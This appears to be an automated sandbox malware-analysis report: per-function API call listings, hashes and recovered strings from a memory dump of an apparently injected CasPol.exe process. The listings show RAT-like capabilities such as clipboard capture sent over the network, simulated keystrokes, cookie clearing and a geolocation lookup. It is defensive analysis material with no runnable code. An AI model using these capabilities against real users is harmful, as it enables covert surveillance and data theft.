                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                                                              • String ID:
                                                                              • API String ID: 3256262068-0
                                                                              • Opcode ID: cde961f71f83e5614e0e0585355dc136788689c58c90c98609e3e8ecc25f0046
                                                                              • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                              • Opcode Fuzzy Hash: cde961f71f83e5614e0e0585355dc136788689c58c90c98609e3e8ecc25f0046
                                                                              • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                              • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                              • _free.LIBCMT ref: 00444714
                                                                              • _free.LIBCMT ref: 0044472D
                                                                              • _free.LIBCMT ref: 0044475F
                                                                              • _free.LIBCMT ref: 00444768
                                                                              • _free.LIBCMT ref: 00444774
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                              • String ID: C
                                                                              • API String ID: 1679612858-1037565863
                                                                              • Opcode ID: 073fed261fa285cd6c65459185357f93b396e03b6829dbcf8ce3010cb8f635a5
                                                                              • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                              • Opcode Fuzzy Hash: 073fed261fa285cd6c65459185357f93b396e03b6829dbcf8ce3010cb8f635a5
                                                                              • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tcp$udp
                                                                              • API String ID: 0-3725065008
                                                                              • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                              • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                              • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                              • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID: gKE$HE$HE
                                                                              • API String ID: 269201875-2777690135
                                                                              • Opcode ID: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                              • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                              • Opcode Fuzzy Hash: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                              • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                              APIs
                                                                              • ExitThread.KERNEL32 ref: 004017F4
                                                                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                              • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                              • String ID: T=G$p[G$>G$>G
                                                                              • API String ID: 1596592924-2461731529
                                                                              • Opcode ID: 1b8bf84dea450e44d0bd2fcad236c79bf01660a7f70610c211099af85f61f11c
                                                                              • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                              • Opcode Fuzzy Hash: 1b8bf84dea450e44d0bd2fcad236c79bf01660a7f70610c211099af85f61f11c
                                                                              • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                              • String ID: .part
                                                                              • API String ID: 1303771098-3499674018
                                                                              • Opcode ID: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
                                                                              • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                              • Opcode Fuzzy Hash: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
                                                                              • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                              APIs
                                                                                • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                              • _wcslen.LIBCMT ref: 0041A8F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                              • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                              • API String ID: 37874593-703403762
                                                                              • Opcode ID: e54d693812cff72c31b5d24a3a054f52b8db401424b79dd542274d10b5a38057
                                                                              • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                              • Opcode Fuzzy Hash: e54d693812cff72c31b5d24a3a054f52b8db401424b79dd542274d10b5a38057
                                                                              • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                              • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                              • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                              • __freea.LIBCMT ref: 00449B37
                                                                                • Part of subcall function 00446AFF: HeapAlloc.KERNEL32(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                              • __freea.LIBCMT ref: 00449B40
                                                                              • __freea.LIBCMT ref: 00449B65
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                              • String ID:
                                                                              • API String ID: 2597970681-0
                                                                              • Opcode ID: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                              • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                              • Opcode Fuzzy Hash: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                              • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                              APIs
                                                                              • SendInput.USER32 ref: 00418B08
                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InputSend$Virtual
                                                                              • String ID:
                                                                              • API String ID: 1167301434-0
                                                                              • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                              • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                              • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                              • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                              APIs
                                                                              • OpenClipboard.USER32 ref: 00415A46
                                                                              • EmptyClipboard.USER32 ref: 00415A54
                                                                              • CloseClipboard.USER32 ref: 00415A5A
                                                                              • OpenClipboard.USER32 ref: 00415A61
                                                                              • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                              • CloseClipboard.USER32 ref: 00415A89
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                              • String ID:
                                                                              • API String ID: 2172192267-0
                                                                              • Opcode ID: be43b12046ea669eaae202fd739bd6432d55700b251bcd6ed2056ddbe96ae737
                                                                              • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                              • Opcode Fuzzy Hash: be43b12046ea669eaae202fd739bd6432d55700b251bcd6ed2056ddbe96ae737
                                                                              • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID:
                                                                              • API String ID: 269201875-0
                                                                              • Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                              • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                              • Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                              • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                              APIs
                                                                                • Part of subcall function 00446AFF: HeapAlloc.KERNEL32(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                              • _free.LIBCMT ref: 00444086
                                                                              • _free.LIBCMT ref: 0044409D
                                                                              • _free.LIBCMT ref: 004440BC
                                                                              • _free.LIBCMT ref: 004440D7
                                                                              • _free.LIBCMT ref: 004440EE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$AllocHeap
                                                                              • String ID: J7D
                                                                              • API String ID: 1835388192-1677391033
                                                                              • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                              • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                              • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                              • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                              APIs
                                                                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044A105
                                                                              • __fassign.LIBCMT ref: 0044A180
                                                                              • __fassign.LIBCMT ref: 0044A19B
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044A1C1
                                                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                              • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                              • String ID:
                                                                              • API String ID: 1324828854-0
                                                                              • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                              • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                              • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                              • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                              APIs
                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseEnumInfoOpenQuerysend
                                                                              • String ID: TUFTUF$>G$DG$DG
                                                                              • API String ID: 3114080316-344394840
                                                                              • Opcode ID: 7214b498c24b6a36b25b04773345f8211cdfd8029bb5f3628422aaf0decccd1e
                                                                              • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                              • Opcode Fuzzy Hash: 7214b498c24b6a36b25b04773345f8211cdfd8029bb5f3628422aaf0decccd1e
                                                                              • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                              APIs
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                              • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                              • String ID: csm
                                                                              • API String ID: 1170836740-1018135373
                                                                              • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                              • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                              • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                              • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                              APIs
                                                                                • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                              • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                              • API String ID: 1133728706-4073444585
                                                                              • Opcode ID: 14f0f96447fa4c6e8905fe9d6b08492cf8f09b5957288703f2a69d5f87ec158c
                                                                              • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                              • Opcode Fuzzy Hash: 14f0f96447fa4c6e8905fe9d6b08492cf8f09b5957288703f2a69d5f87ec158c
                                                                              • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6a5ef57456b0df346b0486265a01e48adde46d03de536ae14a187a8f4c9f433e
                                                                              • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                              • Opcode Fuzzy Hash: 6a5ef57456b0df346b0486265a01e48adde46d03de536ae14a187a8f4c9f433e
                                                                              • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                              • int.LIBCPMT ref: 0040FC0F
                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                              • String ID: P[G
                                                                              • API String ID: 2536120697-571123470
                                                                              • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                              • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                              • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                              • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                              APIs
                                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                              Strings
                                                                              • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Internet$CloseHandleOpen$FileRead
                                                                              • String ID: http://geoplugin.net/json.gp
                                                                              • API String ID: 3121278467-91888290
                                                                              • Opcode ID: cb14169cd2d54e4f0b9a748221c868f26bd958a236bce3cec75326fa3dd5d9bc
                                                                              • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                              • Opcode Fuzzy Hash: cb14169cd2d54e4f0b9a748221c868f26bd958a236bce3cec75326fa3dd5d9bc
                                                                              • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                              APIs
                                                                                • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                              • _free.LIBCMT ref: 0044FD29
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                              • _free.LIBCMT ref: 0044FD34
                                                                              • _free.LIBCMT ref: 0044FD3F
                                                                              • _free.LIBCMT ref: 0044FD93
                                                                              • _free.LIBCMT ref: 0044FD9E
                                                                              • _free.LIBCMT ref: 0044FDA9
                                                                              • _free.LIBCMT ref: 0044FDB4
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                              • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                              • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                              • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                              APIs
                                                                              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835
                                                                                • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                              • CoUninitialize.OLE32 ref: 0040688E
                                                                              Strings
                                                                              Memory Dump Source
